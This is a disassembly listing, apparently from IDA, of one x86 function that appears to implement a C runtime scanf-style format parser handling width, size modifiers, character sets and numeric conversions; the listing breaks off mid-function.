; Attributes: bp-based frame
sub_41D797 proc near ; CODE XREF: sub_418A52+2A�p
var_1C4 = byte ptr -1C4h
var_1C3 = byte ptr -1C3h
var_64 = byte ptr -64h
var_59 = byte ptr -59h
var_44 = dword ptr -44h
var_3E = word ptr -3Eh
var_3C = dword ptr -3Ch
var_38 = byte ptr -38h
var_37 = byte ptr -37h
var_35 = byte ptr -35h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_17 = byte ptr -17h
var_16 = byte ptr -16h
var_15 = byte ptr -15h
var_14 = dword ptr -14h
var_F = byte ptr -0Fh
var_E = byte ptr -0Eh
var_D = byte ptr -0Dh
var_C = dword ptr -0Ch
var_5 = byte ptr -5
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 1C4h
and [ebp+var_15], 0
push ebx
push esi
mov esi, [ebp+arg_4]
xor ebx, ebx
push edi
mov al, [esi]
mov [ebp+var_4], ebx
test al, al
mov [ebp+var_34], ebx
jz loc_41E19D
mov edi, [ebp+arg_0]
jmp short loc_41D7C6
; ---------------------------------------------------------------------------
loc_41D7C1: ; CODE XREF: sub_41D797+9CE�j
mov edi, [ebp+arg_0]
xor ebx, ebx
loc_41D7C6: ; CODE XREF: sub_41D797+28�j
cmp ds:dword_433E7C, 1
jle short loc_41D7DE
movzx eax, al
push 8
push eax
call sub_41A642
pop ecx
pop ecx
jmp short loc_41D7ED
; ---------------------------------------------------------------------------
loc_41D7DE: ; CODE XREF: sub_41D797+36�j
mov ecx, ds:off_433C70
movzx eax, al
mov al, [ecx+eax*2]
and eax, 8
loc_41D7ED: ; CODE XREF: sub_41D797+45�j
cmp eax, ebx
jz short loc_41D827
dec [ebp+var_4]
push edi
lea eax, [ebp+var_4]
push edi
push eax
call sub_41E224
pop ecx
pop ecx
push eax
call sub_41E20D
movzx eax, byte ptr [esi+1]
inc esi
push eax
call sub_420F60
add esp, 0Ch
loc_41D815: ; CODE XREF: sub_41D797+8E�j
test eax, eax
jz short loc_41D827
movzx eax, byte ptr [esi+1]
inc esi
push eax
call sub_420F60
pop ecx
jmp short loc_41D815
; ---------------------------------------------------------------------------
loc_41D827: ; CODE XREF: sub_41D797+58�j
; sub_41D797+80�j
cmp byte ptr [esi], 25h
jnz loc_41E109
and [ebp+var_35], 0
and [ebp+var_18], 0
and [ebp+var_17], 0
and [ebp+var_E], 0
and [ebp+var_F], 0
and [ebp+var_16], 0
xor edi, edi
and [ebp+var_5], 0
mov [ebp+var_1C], ebx
mov [ebp+var_20], ebx
mov [ebp+var_C], ebx
mov [ebp+var_D], 1
mov [ebp+var_30], ebx
loc_41D85E: ; CODE XREF: sub_41D797+172�j
movzx ebx, byte ptr [esi+1]
inc esi
cmp ds:dword_433E7C, 1
jle short loc_41D87B
movzx eax, bl
push 4
push eax
call sub_41A642
pop ecx
pop ecx
jmp short loc_41D88A
; ---------------------------------------------------------------------------
loc_41D87B: ; CODE XREF: sub_41D797+D3�j
mov ecx, ds:off_433C70
movzx eax, bl
mov al, [ecx+eax*2]
and eax, 4
loc_41D88A: ; CODE XREF: sub_41D797+E2�j
test eax, eax
jz short loc_41D8A0
mov eax, [ebp+var_C]
inc [ebp+var_20]
lea eax, [eax+eax*4]
lea eax, [ebx+eax*2-30h]
mov [ebp+var_C], eax
jmp short loc_41D905
; ---------------------------------------------------------------------------
loc_41D8A0: ; CODE XREF: sub_41D797+F5�j
cmp ebx, 4Eh
jg short loc_41D8E3
jz short loc_41D905
cmp ebx, 2Ah
jz short loc_41D8DE
cmp ebx, 46h
jz short loc_41D905
cmp ebx, 49h
jz short loc_41D8C0
cmp ebx, 4Ch
jnz short loc_41D8F2
inc [ebp+var_D]
jmp short loc_41D905
; ---------------------------------------------------------------------------
loc_41D8C0: ; CODE XREF: sub_41D797+11D�j
cmp byte ptr [esi+1], 36h
jnz short loc_41D8F2
cmp byte ptr [esi+2], 34h
lea eax, [esi+2]
jnz short loc_41D8F2
inc [ebp+var_30]
and [ebp+var_28], 0
and [ebp+var_24], 0
mov esi, eax
jmp short loc_41D905
; ---------------------------------------------------------------------------
loc_41D8DE: ; CODE XREF: sub_41D797+113�j
inc [ebp+var_E]
jmp short loc_41D905
; ---------------------------------------------------------------------------
loc_41D8E3: ; CODE XREF: sub_41D797+10C�j
cmp ebx, 68h
jz short loc_41D8FF
cmp ebx, 6Ch
jz short loc_41D8F7
cmp ebx, 77h
jz short loc_41D8FA
loc_41D8F2: ; CODE XREF: sub_41D797+122�j
; sub_41D797+12D�j ...
inc [ebp+var_F]
jmp short loc_41D905
; ---------------------------------------------------------------------------
loc_41D8F7: ; CODE XREF: sub_41D797+154�j
inc [ebp+var_D]
loc_41D8FA: ; CODE XREF: sub_41D797+159�j
inc [ebp+var_5]
jmp short loc_41D905
; ---------------------------------------------------------------------------
loc_41D8FF: ; CODE XREF: sub_41D797+14F�j
dec [ebp+var_D]
dec [ebp+var_5]
loc_41D905: ; CODE XREF: sub_41D797+107�j
; sub_41D797+10E�j ...
cmp [ebp+var_F], 0
jz loc_41D85E
cmp [ebp+var_E], 0
mov [ebp+arg_4], esi
jnz short loc_41D92A
mov eax, [ebp+arg_8]
mov [ebp+var_44], eax
add eax, 4
mov [ebp+arg_8], eax
mov eax, [eax-4]
mov [ebp+var_2C], eax
loc_41D92A: ; CODE XREF: sub_41D797+17F�j
and [ebp+var_F], 0
cmp [ebp+var_5], 0
jnz short loc_41D948
mov al, [esi]
cmp al, 53h
jz short loc_41D944
cmp al, 43h
jz short loc_41D944
or [ebp+var_5], 0FFh
jmp short loc_41D948
; ---------------------------------------------------------------------------
loc_41D944: ; CODE XREF: sub_41D797+1A1�j
; sub_41D797+1A5�j
mov [ebp+var_5], 1
loc_41D948: ; CODE XREF: sub_41D797+19B�j
; sub_41D797+1AB�j
mov ebx, [ebp+arg_4]
movzx esi, byte ptr [ebx]
or esi, 20h
cmp esi, 6Eh
mov [ebp+var_3C], esi
jz short loc_41D981
cmp esi, 63h
jz short loc_41D972
cmp esi, 7Bh
jz short loc_41D972
push [ebp+arg_0]
lea eax, [ebp+var_4]
push eax
call sub_41E224
pop ecx
jmp short loc_41D97D
; ---------------------------------------------------------------------------
loc_41D972: ; CODE XREF: sub_41D797+1C5�j
; sub_41D797+1CA�j
push [ebp+arg_0]
inc [ebp+var_4]
call sub_41E1F3
loc_41D97D: ; CODE XREF: sub_41D797+1D9�j
pop ecx
mov [ebp+var_14], eax
loc_41D981: ; CODE XREF: sub_41D797+1C0�j
xor eax, eax
cmp [ebp+var_20], eax
jz short loc_41D991
cmp [ebp+var_C], eax
jz loc_41E16D
loc_41D991: ; CODE XREF: sub_41D797+1EF�j
cmp esi, 6Fh
jg loc_41DBF8
jz loc_41DEAA
cmp esi, 63h
jz loc_41DBD5
cmp esi, 64h
jz loc_41DEAA
jle loc_41DC22
cmp esi, 67h
jle short loc_41D9F5
cmp esi, 69h
jz short loc_41D9DD
cmp esi, 6Eh
jnz loc_41DC22
cmp [ebp+var_E], 0
mov edi, [ebp+var_4]
jz loc_41E0D8
jmp loc_41E0FE
; ---------------------------------------------------------------------------
loc_41D9DD: ; CODE XREF: sub_41D797+229�j
push 64h
pop esi
loc_41D9E0: ; CODE XREF: sub_41D797+480�j
mov ebx, [ebp+var_14]
cmp ebx, 2Dh
jnz loc_41DC6A
mov [ebp+var_17], 1
jmp loc_41DC6F
; ---------------------------------------------------------------------------
loc_41D9F5: ; CODE XREF: sub_41D797+224�j
mov ebx, [ebp+var_14]
lea esi, [ebp+var_1C4]
cmp ebx, 2Dh
jnz short loc_41DA11
mov [ebp+var_1C4], bl
lea esi, [ebp+var_1C3]
jmp short loc_41DA16
; ---------------------------------------------------------------------------
loc_41DA11: ; CODE XREF: sub_41D797+26A�j
cmp ebx, 2Bh
jnz short loc_41DA2D
loc_41DA16: ; CODE XREF: sub_41D797+278�j
mov edi, [ebp+arg_0]
dec [ebp+var_C]
inc [ebp+var_4]
push edi
call sub_41E1F3
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
jmp short loc_41DA30
; ---------------------------------------------------------------------------
loc_41DA2D: ; CODE XREF: sub_41D797+27D�j
mov edi, [ebp+arg_0]
loc_41DA30: ; CODE XREF: sub_41D797+294�j
cmp [ebp+var_20], 0
jz short loc_41DA3F
cmp [ebp+var_C], 15Dh
jle short loc_41DA46
loc_41DA3F: ; CODE XREF: sub_41D797+29D�j
mov [ebp+var_C], 15Dh
loc_41DA46: ; CODE XREF: sub_41D797+2A6�j
; sub_41D797+2F2�j
cmp ds:dword_433E7C, 1
jle short loc_41DA5B
push 4
push ebx
call sub_41A642
pop ecx
pop ecx
jmp short loc_41DA66
; ---------------------------------------------------------------------------
loc_41DA5B: ; CODE XREF: sub_41D797+2B6�j
mov eax, ds:off_433C70
mov al, [eax+ebx*2]
and eax, 4
loc_41DA66: ; CODE XREF: sub_41D797+2C2�j
test eax, eax
jz short loc_41DA8B
mov eax, [ebp+var_C]
dec [ebp+var_C]
test eax, eax
jz short loc_41DA8B
inc [ebp+var_1C]
mov [esi], bl
inc esi
inc [ebp+var_4]
push edi
call sub_41E1F3
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
jmp short loc_41DA46
; ---------------------------------------------------------------------------
loc_41DA8B: ; CODE XREF: sub_41D797+2D1�j
; sub_41D797+2DB�j
cmp ds:byte_433E80, bl
jnz short loc_41DAF9
mov eax, [ebp+var_C]
dec [ebp+var_C]
test eax, eax
jz short loc_41DAF9
inc [ebp+var_4]
push edi
call sub_41E1F3
mov ebx, eax
mov al, ds:byte_433E80
mov [esi], al
pop ecx
mov [ebp+var_14], ebx
inc esi
loc_41DAB4: ; CODE XREF: sub_41D797+360�j
cmp ds:dword_433E7C, 1
jle short loc_41DAC9
push 4
push ebx
call sub_41A642
pop ecx
pop ecx
jmp short loc_41DAD4
; ---------------------------------------------------------------------------
loc_41DAC9: ; CODE XREF: sub_41D797+324�j
mov eax, ds:off_433C70
mov al, [eax+ebx*2]
and eax, 4
loc_41DAD4: ; CODE XREF: sub_41D797+330�j
test eax, eax
jz short loc_41DAF9
mov eax, [ebp+var_C]
dec [ebp+var_C]
test eax, eax
jz short loc_41DAF9
inc [ebp+var_1C]
mov [esi], bl
inc esi
inc [ebp+var_4]
push edi
call sub_41E1F3
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
jmp short loc_41DAB4
; ---------------------------------------------------------------------------
loc_41DAF9: ; CODE XREF: sub_41D797+2FA�j
; sub_41D797+304�j ...
cmp [ebp+var_1C], 0
jz loc_41DB91
cmp ebx, 65h
jz short loc_41DB11
cmp ebx, 45h
jnz loc_41DB91
loc_41DB11: ; CODE XREF: sub_41D797+36F�j
mov eax, [ebp+var_C]
dec [ebp+var_C]
test eax, eax
jz short loc_41DB91
mov byte ptr [esi], 65h
inc esi
inc [ebp+var_4]
push edi
call sub_41E1F3
mov ebx, eax
pop ecx
cmp ebx, 2Dh
mov [ebp+var_14], ebx
jnz short loc_41DB38
mov [esi], al
inc esi
jmp short loc_41DB3D
; ---------------------------------------------------------------------------
loc_41DB38: ; CODE XREF: sub_41D797+39A�j
cmp ebx, 2Bh
jnz short loc_41DB5B
loc_41DB3D: ; CODE XREF: sub_41D797+39F�j
mov eax, [ebp+var_C]
dec [ebp+var_C]
test eax, eax
jnz short loc_41DB4C
and [ebp+var_C], eax
jmp short loc_41DB5B
; ---------------------------------------------------------------------------
loc_41DB4C: ; CODE XREF: sub_41D797+3AE�j
; sub_41D797+3F8�j
inc [ebp+var_4]
push edi
call sub_41E1F3
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
loc_41DB5B: ; CODE XREF: sub_41D797+3A4�j
; sub_41D797+3B3�j
cmp ds:dword_433E7C, 1
jle short loc_41DB70
push 4
push ebx
call sub_41A642
pop ecx
pop ecx
jmp short loc_41DB7B
; ---------------------------------------------------------------------------
loc_41DB70: ; CODE XREF: sub_41D797+3CB�j
mov eax, ds:off_433C70
mov al, [eax+ebx*2]
and eax, 4
loc_41DB7B: ; CODE XREF: sub_41D797+3D7�j
test eax, eax
jz short loc_41DB91
mov eax, [ebp+var_C]
dec [ebp+var_C]
test eax, eax
jz short loc_41DB91
inc [ebp+var_1C]
mov [esi], bl
inc esi
jmp short loc_41DB4C
; ---------------------------------------------------------------------------
loc_41DB91: ; CODE XREF: sub_41D797+366�j
; sub_41D797+374�j ...
dec [ebp+var_4]
push edi
push ebx
call sub_41E20D
cmp [ebp+var_1C], 0
pop ecx
pop ecx
jz loc_41E19D
cmp [ebp+var_E], 0
jnz loc_41E0FE
inc [ebp+var_34]
and byte ptr [esi], 0
lea eax, [ebp+var_1C4]
push eax
movsx eax, [ebp+var_D]
push [ebp+var_2C]
dec eax
push eax
call ds:off_435FD8
add esp, 0Ch
jmp loc_41E0FE
; ---------------------------------------------------------------------------
loc_41DBD5: ; CODE XREF: sub_41D797+20C�j
cmp [ebp+var_20], eax
jnz short loc_41DBE4
inc [ebp+var_C]
mov [ebp+var_20], 1
loc_41DBE4: ; CODE XREF: sub_41D797+441�j
cmp [ebp+var_5], 0
jle short loc_41DBEE
mov [ebp+var_16], 1
loc_41DBEE: ; CODE XREF: sub_41D797+451�j
mov edi, offset dword_436000
jmp loc_41DD03
; ---------------------------------------------------------------------------
loc_41DBF8: ; CODE XREF: sub_41D797+1FD�j
mov eax, esi
sub eax, 70h
jz loc_41DEA6
sub eax, 3
jz loc_41DCF4
dec eax
dec eax
jz loc_41DEAA
sub eax, 3
jz loc_41D9E0
sub eax, 3
jz short loc_41DC46
loc_41DC22: ; CODE XREF: sub_41D797+21B�j
; sub_41D797+22E�j
movzx eax, byte ptr [ebx]
cmp eax, [ebp+var_14]
jnz loc_41E16D
dec [ebp+var_15]
cmp [ebp+var_E], 0
jnz loc_41E0FE
mov eax, [ebp+var_44]
mov [ebp+arg_8], eax
jmp loc_41E0FE
; ---------------------------------------------------------------------------
loc_41DC46: ; CODE XREF: sub_41D797+489�j
cmp [ebp+var_5], 0
jle short loc_41DC50
mov [ebp+var_16], 1
loc_41DC50: ; CODE XREF: sub_41D797+4B3�j
mov edi, [ebp+arg_4]
inc edi
mov [ebp+arg_4], edi
cmp byte ptr [edi], 5Eh
jnz loc_41DD07
mov eax, edi
lea edi, [eax+1]
jmp loc_41DD03
; ---------------------------------------------------------------------------
loc_41DC6A: ; CODE XREF: sub_41D797+24F�j
cmp ebx, 2Bh
jnz short loc_41DC91
loc_41DC6F: ; CODE XREF: sub_41D797+259�j
dec [ebp+var_C]
jnz short loc_41DC80
cmp [ebp+var_20], 0
jz short loc_41DC80
mov [ebp+var_F], 1
jmp short loc_41DC91
; ---------------------------------------------------------------------------
loc_41DC80: ; CODE XREF: sub_41D797+4DB�j
; sub_41D797+4E1�j
push [ebp+arg_0]
inc [ebp+var_4]
call sub_41E1F3
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
loc_41DC91: ; CODE XREF: sub_41D797+4D6�j
; sub_41D797+4E7�j
cmp ebx, 30h
jnz loc_41DEDF
push [ebp+arg_0]
inc [ebp+var_4]
call sub_41E1F3
mov ebx, eax
pop ecx
cmp bl, 78h
mov [ebp+var_14], ebx
jz short loc_41DCDF
cmp bl, 58h
jz short loc_41DCDF
cmp esi, 78h
mov [ebp+var_1C], 1
jz short loc_41DCC9
push 6Fh
loc_41DCC3: ; CODE XREF: sub_41D797+55B�j
pop esi
jmp loc_41DEDF
; ---------------------------------------------------------------------------
loc_41DCC9: ; CODE XREF: sub_41D797+528�j
push [ebp+arg_0]
dec [ebp+var_4]
push ebx
call sub_41E20D
pop ecx
pop ecx
push 30h
pop ebx
jmp loc_41DEDC
; ---------------------------------------------------------------------------
loc_41DCDF: ; CODE XREF: sub_41D797+517�j
; sub_41D797+51C�j
push [ebp+arg_0]
inc [ebp+var_4]
call sub_41E1F3
pop ecx
mov ebx, eax
mov [ebp+var_14], ebx
push 78h
jmp short loc_41DCC3
; ---------------------------------------------------------------------------
loc_41DCF4: ; CODE XREF: sub_41D797+46F�j
cmp [ebp+var_5], 0
jle short loc_41DCFE
mov [ebp+var_16], 1
loc_41DCFE: ; CODE XREF: sub_41D797+561�j
mov edi, offset dword_435FF8
loc_41DD03: ; CODE XREF: sub_41D797+45C�j
; sub_41D797+4CE�j
or [ebp+var_18], 0FFh
loc_41DD07: ; CODE XREF: sub_41D797+4C3�j
push 20h
lea eax, [ebp+var_64]
push 0
push eax
call sub_417330
add esp, 0Ch
cmp [ebp+var_3C], 7Bh
jnz short loc_41DD2B
cmp byte ptr [edi], 5Dh
jnz short loc_41DD2B
mov dl, 5Dh
inc edi
mov [ebp+var_59], 20h
jmp short loc_41DD2E
; ---------------------------------------------------------------------------
loc_41DD2B: ; CODE XREF: sub_41D797+584�j
; sub_41D797+589�j
mov dl, [ebp+var_35]
loc_41DD2E: ; CODE XREF: sub_41D797+592�j
; sub_41D797+5E1�j ...
mov al, [edi]
cmp al, 5Dh
jz short loc_41DD93
inc edi
cmp al, 2Dh
jnz short loc_41DD7A
test dl, dl
jz short loc_41DD7A
mov cl, [edi]
cmp cl, 5Dh
jz short loc_41DD7A
inc edi
cmp dl, cl
jnb short loc_41DD4D
mov al, cl
jmp short loc_41DD51
; ---------------------------------------------------------------------------
loc_41DD4D: ; CODE XREF: sub_41D797+5B0�j
mov al, dl
mov dl, cl
loc_41DD51: ; CODE XREF: sub_41D797+5B4�j
cmp dl, al
ja short loc_41DD76
movzx edx, dl
movzx esi, al
sub esi, edx
inc esi
loc_41DD5E: ; CODE XREF: sub_41D797+5DD�j
mov ecx, edx
mov eax, edx
and ecx, 7
mov bl, 1
shr eax, 3
shl bl, cl
lea eax, [ebp+eax+var_64]
or [eax], bl
inc edx
dec esi
jnz short loc_41DD5E
loc_41DD76: ; CODE XREF: sub_41D797+5BC�j
xor dl, dl
jmp short loc_41DD2E
; ---------------------------------------------------------------------------
loc_41DD7A: ; CODE XREF: sub_41D797+5A0�j
; sub_41D797+5A4�j ...
movzx ecx, al
mov dl, al
mov eax, ecx
and ecx, 7
mov bl, 1
shr eax, 3
shl bl, cl
lea eax, [ebp+eax+var_64]
or [eax], bl
jmp short loc_41DD2E
; ---------------------------------------------------------------------------
loc_41DD93: ; CODE XREF: sub_41D797+59B�j
cmp byte ptr [edi], 0
jz loc_41E19D
cmp [ebp+var_3C], 7Bh
jnz short loc_41DDA5
mov [ebp+arg_4], edi
loc_41DDA5: ; CODE XREF: sub_41D797+609�j
mov edi, [ebp+arg_0]
mov esi, [ebp+var_2C]
dec [ebp+var_4]
push edi
push [ebp+var_14]
mov [ebp+var_30], esi
call sub_41E20D
pop ecx
pop ecx
loc_41DDBC: ; CODE XREF: sub_41D797+6BC�j
; sub_41D797+6C4�j
cmp [ebp+var_20], 0
jz short loc_41DDD0
mov eax, [ebp+var_C]
dec [ebp+var_C]
test eax, eax
jz loc_41DE6C
loc_41DDD0: ; CODE XREF: sub_41D797+629�j
inc [ebp+var_4]
push edi
call sub_41E1F3
cmp eax, 0FFFFFFFFh
pop ecx
mov [ebp+var_14], eax
jz short loc_41DE60
mov ecx, eax
push 1
and ecx, 7
pop edx
movsx ebx, [ebp+var_18]
shl edx, cl
mov ecx, eax
sar ecx, 3
movsx ecx, [ebp+ecx+var_64]
xor ecx, ebx
test edx, ecx
jz short loc_41DE60
cmp [ebp+var_E], 0
jnz short loc_41DE58
cmp [ebp+var_16], 0
jz short loc_41DE4D
mov ecx, ds:off_433C70
mov [ebp+var_38], al
movzx eax, al
test byte ptr [ecx+eax*2+1], 80h
jz short loc_41DE2C
inc [ebp+var_4]
push edi
call sub_41E1F3
pop ecx
mov [ebp+var_37], al
loc_41DE2C: ; CODE XREF: sub_41D797+686�j
push ds:dword_433E7C
lea eax, [ebp+var_38]
push eax
lea eax, [ebp+var_3E]
push eax
call sub_420E98
mov ax, [ebp+var_3E]
add esp, 0Ch
mov [esi], ax
inc esi
inc esi
jmp short loc_41DE50
; ---------------------------------------------------------------------------
loc_41DE4D: ; CODE XREF: sub_41D797+673�j
mov [esi], al
inc esi
loc_41DE50: ; CODE XREF: sub_41D797+6B4�j
mov [ebp+var_2C], esi
jmp loc_41DDBC
; ---------------------------------------------------------------------------
loc_41DE58: ; CODE XREF: sub_41D797+66D�j
inc [ebp+var_30]
jmp loc_41DDBC
; ---------------------------------------------------------------------------
loc_41DE60: ; CODE XREF: sub_41D797+649�j
; sub_41D797+667�j
dec [ebp+var_4]
push edi
push eax
call sub_41E20D
pop ecx
pop ecx
loc_41DE6C: ; CODE XREF: sub_41D797+633�j
cmp [ebp+var_30], esi
jz loc_41E19D
cmp [ebp+var_E], 0
jnz loc_41E0FE
inc [ebp+var_34]
cmp [ebp+var_3C], 63h
jz loc_41E0FE
cmp [ebp+var_16], 0
mov eax, [ebp+var_2C]
jz short loc_41DE9E
and word ptr [eax], 0
jmp loc_41E0FE
; ---------------------------------------------------------------------------
loc_41DE9E: ; CODE XREF: sub_41D797+6FC�j
and byte ptr [eax], 0
jmp loc_41E0FE
; ---------------------------------------------------------------------------
loc_41DEA6: ; CODE XREF: sub_41D797+466�j
mov [ebp+var_D], 1
loc_41DEAA: ; CODE XREF: sub_41D797+203�j
; sub_41D797+215�j ...
mov ebx, [ebp+var_14]
cmp ebx, 2Dh
jnz short loc_41DEB8
mov [ebp+var_17], 1
jmp short loc_41DEBD
; ---------------------------------------------------------------------------
loc_41DEB8: ; CODE XREF: sub_41D797+719�j
cmp ebx, 2Bh
jnz short loc_41DEDF
loc_41DEBD: ; CODE XREF: sub_41D797+71F�j
dec [ebp+var_C]
jnz short loc_41DECE
cmp [ebp+var_20], 0
jz short loc_41DECE
mov [ebp+var_F], 1
jmp short loc_41DEDF
; ---------------------------------------------------------------------------
loc_41DECE: ; CODE XREF: sub_41D797+729�j
; sub_41D797+72F�j
push [ebp+arg_0]
inc [ebp+var_4]
call sub_41E1F3
pop ecx
mov ebx, eax
loc_41DEDC: ; CODE XREF: sub_41D797+543�j
mov [ebp+var_14], ebx
loc_41DEDF: ; CODE XREF: sub_41D797+4FD�j
; sub_41D797+52D�j ...
cmp [ebp+var_30], 0
jz loc_41DFF8
cmp [ebp+var_F], 0
jnz loc_41DFD6
loc_41DEF3: ; CODE XREF: sub_41D797+82C�j
cmp esi, 78h
jnz short loc_41DF47
cmp ds:dword_433E7C, 1
jle short loc_41DF10
push 80h
push ebx
call sub_41A642
pop ecx
pop ecx
jmp short loc_41DF1D
; ---------------------------------------------------------------------------
loc_41DF10: ; CODE XREF: sub_41D797+768�j
mov eax, ds:off_433C70
mov al, [eax+ebx*2]
and eax, 80h
loc_41DF1D: ; CODE XREF: sub_41D797+777�j
test eax, eax
jz loc_41DFC8
mov eax, [ebp+var_28]
mov edx, [ebp+var_24]
push 4
pop ecx
call sub_420F90
push ebx
mov [ebp+var_28], eax
mov [ebp+var_24], edx
call sub_41E1BC
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
jmp short loc_41DF9A
; ---------------------------------------------------------------------------
loc_41DF47: ; CODE XREF: sub_41D797+75F�j
cmp ds:dword_433E7C, 1
jle short loc_41DF5C
push 4
push ebx
call sub_41A642
pop ecx
pop ecx
jmp short loc_41DF67
; ---------------------------------------------------------------------------
loc_41DF5C: ; CODE XREF: sub_41D797+7B7�j
mov eax, ds:off_433C70
mov al, [eax+ebx*2]
and eax, 4
loc_41DF67: ; CODE XREF: sub_41D797+7C3�j
test eax, eax
jz short loc_41DFC8
cmp esi, 6Fh
jnz short loc_41DF85
cmp ebx, 38h
jge short loc_41DFC8
mov eax, [ebp+var_28]
mov edx, [ebp+var_24]
push 3
pop ecx
call sub_420F90
jmp short loc_41DF94
; ---------------------------------------------------------------------------
loc_41DF85: ; CODE XREF: sub_41D797+7D7�j
push 0
push 0Ah
push [ebp+var_24]
push [ebp+var_28]
call sub_417760
loc_41DF94: ; CODE XREF: sub_41D797+7EC�j
mov [ebp+var_28], eax
mov [ebp+var_24], edx
loc_41DF9A: ; CODE XREF: sub_41D797+7AE�j
inc [ebp+var_1C]
lea eax, [ebx-30h]
cdq
add [ebp+var_28], eax
adc [ebp+var_24], edx
cmp [ebp+var_20], 0
jz short loc_41DFB2
dec [ebp+var_C]
jz short loc_41DFD6
loc_41DFB2: ; CODE XREF: sub_41D797+814�j
push [ebp+arg_0]
inc [ebp+var_4]
call sub_41E1F3
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
jmp loc_41DEF3
; ---------------------------------------------------------------------------
loc_41DFC8: ; CODE XREF: sub_41D797+788�j
; sub_41D797+7D2�j ...
push [ebp+arg_0]
dec [ebp+var_4]
push ebx
call sub_41E20D
pop ecx
pop ecx
loc_41DFD6: ; CODE XREF: sub_41D797+756�j
; sub_41D797+819�j
cmp [ebp+var_17], 0
jz loc_41E0BC
mov eax, [ebp+var_28]
mov ecx, [ebp+var_24]
neg eax
adc ecx, 0
mov [ebp+var_28], eax
neg ecx
mov [ebp+var_24], ecx
jmp loc_41E0BC
; ---------------------------------------------------------------------------
loc_41DFF8: ; CODE XREF: sub_41D797+74C�j
cmp [ebp+var_F], 0
jnz loc_41E0B4
loc_41E002: ; CODE XREF: sub_41D797+90A�j
cmp esi, 78h
jz short loc_41E046
cmp esi, 70h
jz short loc_41E046
cmp ds:dword_433E7C, 1
jle short loc_41E021
push 4
push ebx
call sub_41A642
pop ecx
pop ecx
jmp short loc_41E02C
; ---------------------------------------------------------------------------
loc_41E021: ; CODE XREF: sub_41D797+87C�j
mov eax, ds:off_433C70
mov al, [eax+ebx*2]
and eax, 4
loc_41E02C: ; CODE XREF: sub_41D797+888�j
test eax, eax
jz short loc_41E0A6
cmp esi, 6Fh
jnz short loc_41E03F
cmp ebx, 38h
jge short loc_41E0A6
shl edi, 3
jmp short loc_41E07E
; ---------------------------------------------------------------------------
loc_41E03F: ; CODE XREF: sub_41D797+89C�j
lea edi, [edi+edi*4]
shl edi, 1
jmp short loc_41E07E
; ---------------------------------------------------------------------------
loc_41E046: ; CODE XREF: sub_41D797+86E�j
; sub_41D797+873�j
cmp ds:dword_433E7C, 1
jle short loc_41E05E
push 80h
push ebx
call sub_41A642
pop ecx
pop ecx
jmp short loc_41E06B
; ---------------------------------------------------------------------------
loc_41E05E: ; CODE XREF: sub_41D797+8B6�j
mov eax, ds:off_433C70
mov al, [eax+ebx*2]
and eax, 80h
loc_41E06B: ; CODE XREF: sub_41D797+8C5�j
test eax, eax
jz short loc_41E0A6
push ebx
shl edi, 4
call sub_41E1BC
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
loc_41E07E: ; CODE XREF: sub_41D797+8A6�j
; sub_41D797+8AD�j
inc [ebp+var_1C]
cmp [ebp+var_20], 0
lea edi, [edi+ebx-30h]
jz short loc_41E090
dec [ebp+var_C]
jz short loc_41E0B4
loc_41E090: ; CODE XREF: sub_41D797+8F2�j
push [ebp+arg_0]
inc [ebp+var_4]
call sub_41E1F3
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
jmp loc_41E002
; ---------------------------------------------------------------------------
loc_41E0A6: ; CODE XREF: sub_41D797+897�j
; sub_41D797+8A1�j ...
push [ebp+arg_0]
dec [ebp+var_4]
push ebx
call sub_41E20D
pop ecx
pop ecx
loc_41E0B4: ; CODE XREF: sub_41D797+865�j
; sub_41D797+8F7�j
cmp [ebp+var_17], 0
jz short loc_41E0BC
neg edi
loc_41E0BC: ; CODE XREF: sub_41D797+843�j
; sub_41D797+85C�j ...
cmp esi, 46h
jnz short loc_41E0C5
and [ebp+var_1C], 0
loc_41E0C5: ; CODE XREF: sub_41D797+928�j
cmp [ebp+var_1C], 0
jz loc_41E19D
cmp [ebp+var_E], 0
jnz short loc_41E0FE
inc [ebp+var_34]
loc_41E0D8: ; CODE XREF: sub_41D797+23B�j
cmp [ebp+var_30], 0
jz short loc_41E0EE
mov eax, [ebp+var_2C]
mov ecx, [ebp+var_28]
mov [eax], ecx
mov ecx, [ebp+var_24]
mov [eax+4], ecx
jmp short loc_41E0FE
; ---------------------------------------------------------------------------
loc_41E0EE: ; CODE XREF: sub_41D797+945�j
cmp [ebp+var_D], 0
mov eax, [ebp+var_2C]
jz short loc_41E0FB
mov [eax], edi
jmp short loc_41E0FE
; ---------------------------------------------------------------------------
loc_41E0FB: ; CODE XREF: sub_41D797+95E�j
mov [eax], di
loc_41E0FE: ; CODE XREF: sub_41D797+241�j
; sub_41D797+414�j ...
inc [ebp+var_15]
inc [ebp+arg_4]
mov esi, [ebp+arg_4]
jmp short loc_41E14B
; ---------------------------------------------------------------------------
loc_41E109: ; CODE XREF: sub_41D797+93�j
inc [ebp+var_4]
push edi
call sub_41E1F3
mov ebx, eax
pop ecx
movzx eax, byte ptr [esi]
inc esi
cmp eax, ebx
mov [ebp+var_14], ebx
mov [ebp+arg_4], esi
jnz short loc_41E178
mov ecx, ds:off_433C70
movzx eax, bl
test byte ptr [ecx+eax*2+1], 80h
jz short loc_41E14B
inc [ebp+var_4]
push edi
call sub_41E1F3
pop ecx
movzx ecx, byte ptr [esi]
inc esi
cmp ecx, eax
mov [ebp+arg_4], esi
jnz short loc_41E186
dec [ebp+var_4]
loc_41E14B: ; CODE XREF: sub_41D797+970�j
; sub_41D797+99A�j
cmp [ebp+var_14], 0FFFFFFFFh
jnz short loc_41E161
cmp byte ptr [esi], 25h
jnz short loc_41E1A3
mov eax, [ebp+arg_4]
cmp byte ptr [eax+1], 6Eh
jnz short loc_41E1A3
mov esi, eax
